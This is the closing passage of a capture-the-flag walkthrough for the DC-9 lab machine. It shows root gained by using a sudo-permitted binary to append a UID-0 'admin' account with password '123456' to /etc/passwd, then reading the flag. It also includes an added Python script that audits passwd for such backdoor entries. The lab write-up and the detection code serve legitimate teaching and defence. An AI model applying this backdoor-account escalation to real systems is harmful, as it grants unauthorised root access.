-rw-r--r-- 1 root root  779676 Dec 29  2019 base_library.zip
-rwxr-xr-x 1 root root   26136 Apr  3  2019 _bz2.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  153904 Apr  3  2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  158032 Apr  3  2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   31024 Apr  3  2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  272688 Apr  3  2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  141616 Apr  3  2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  112944 Apr  3  2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   34008 Apr  3  2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   74688 Jul 11  2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13  2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root  243840 Sep 20  2019 libexpat.so.1
-rwxr-xr-x 1 root root  158400 Jan 28  2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr  3  2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root  309096 May  6  2018 libreadline.so.7
-rwxr-xr-x 1 root root  593696 Oct 13  2019 libssl.so.1.1
-rwxr-xr-x 1 root root  183528 Aug  6  2019 libtinfo.so.6
-rwxr-xr-x 1 root root  121280 Sep 26  2017 libz.so.1
-rwxr-xr-x 1 root root   37688 Apr  3  2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   64792 Apr  3  2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   14632 Apr  3  2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   39944 Apr  3  2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   19752 Apr  3  2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  116568 Apr  3  2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   29064 Apr  3  2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29  2019 test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ 

The entry is successfully appended to the /etc/passwd file.
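The line just appended is the artifact a defender looks for: a second UID 0 account, with a password hash stored directly in /etc/passwd instead of /etc/shadow. The following Python is an added audit example, not part of the original article; it parses passwd entries and flags exactly those conditions. The sample file is constructed for the example and includes the admin line from this walkthrough.

```python
"""Audit /etc/passwd for the kind of entry the walkthrough appends."""

# Constructed sample (a few system accounts plus the appended admin line);
# not a capture from the machine.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash
"""


def audit_passwd(text: str) -> list:
    """Return one finding per suspicious entry.

    Flags: a UID-0 account other than root, a UID shared by two accounts, a
    password hash stored in field 2 instead of 'x' (world-readable and not
    subject to /etc/shadow policy), an empty password field, and malformed
    lines.
    """
    findings = []
    seen_uids = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": lineno, "user": line, "issue": "malformed entry"})
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append({"line": lineno, "user": name,
                             "issue": "uid 0 account other than root"})
        if pw == "":
            findings.append({"line": lineno, "user": name, "issue": "empty password field"})
        elif not (pw == "x" or pw.startswith(("*", "!"))):
            findings.append({"line": lineno, "user": name,
                             "issue": "password hash stored in /etc/passwd"})
        if uid in seen_uids:
            findings.append({"line": lineno, "user": name,
                             "issue": f"duplicate uid {uid} (also used by {seen_uids[uid]})"})
        else:
            seen_uids[uid] = name
    return findings


def audit_file(path: str = "/etc/passwd") -> list:
    """Run the audit against a real passwd file."""
    with open(path, encoding="utf-8") as f:
        return audit_passwd(f.read())


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {finding['line']}: {finding['user']}: {finding['issue']}")
```

On the sample the admin line produces three findings (extra UID 0, hash in passwd, duplicate UID 0). In practice this check belongs in file-integrity monitoring of /etc/passwd and /etc/sudoers alongside an audit rule on writes to /etc/passwd, since a sudo rule like the one granted to fredf turns any append into full root.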

3.5.3 Getting the flag

3.5.3.1 Switch to the admin user

Username: admin
Password: 123456

fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password: 
root@dc-9:/opt/devstuff/dist/test# 

The prompt shows that we now have root.

3.5.3.2 Finding the flag file

root@dc-9:/opt/devstuff/dist/test# find / -name *flag*
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/sda/hctx0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/var/lib/mysql/debian-10.3.flag
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/man/fr/man1/dpkg-buildflags.1.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/dpkg/buildflags.mk

Location of the flag file:
/root/theflag.txt

3.5.3.3 Reading the flag file

root@dc-9:/opt/devstuff/dist/test# cat /root/theflag.txt
███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

root@dc-9:/opt/devstuff/dist/test# 

This concludes the DC-9 penetration test; the final flag has been obtained. O(∩_∩)O haha~ The whole article comes to 40,627 characters, phew.


Summary

The DC-9 penetration test covered nmap scanning, directory scanning (nikto/dirsearch/dirb), SQL injection, wfuzz brute forcing, LFI file inclusion, SSH brute forcing (knockd/nmap/netcat/Hydra) and Linux privilege escalation (openssl) to obtain the flag. The approach was:

  • Host discovery and port scanning with nmap
  • Directory scanning (nikto/dirsearch/dirb)
  • LFI file inclusion vulnerability
  • SQL injection with sqlmap to obtain user information
  • Password brute forcing with hydra
  • SSH brute forcing (knockd/nmap/netcat/Hydra)
  • Linux privilege escalation to obtain the flag

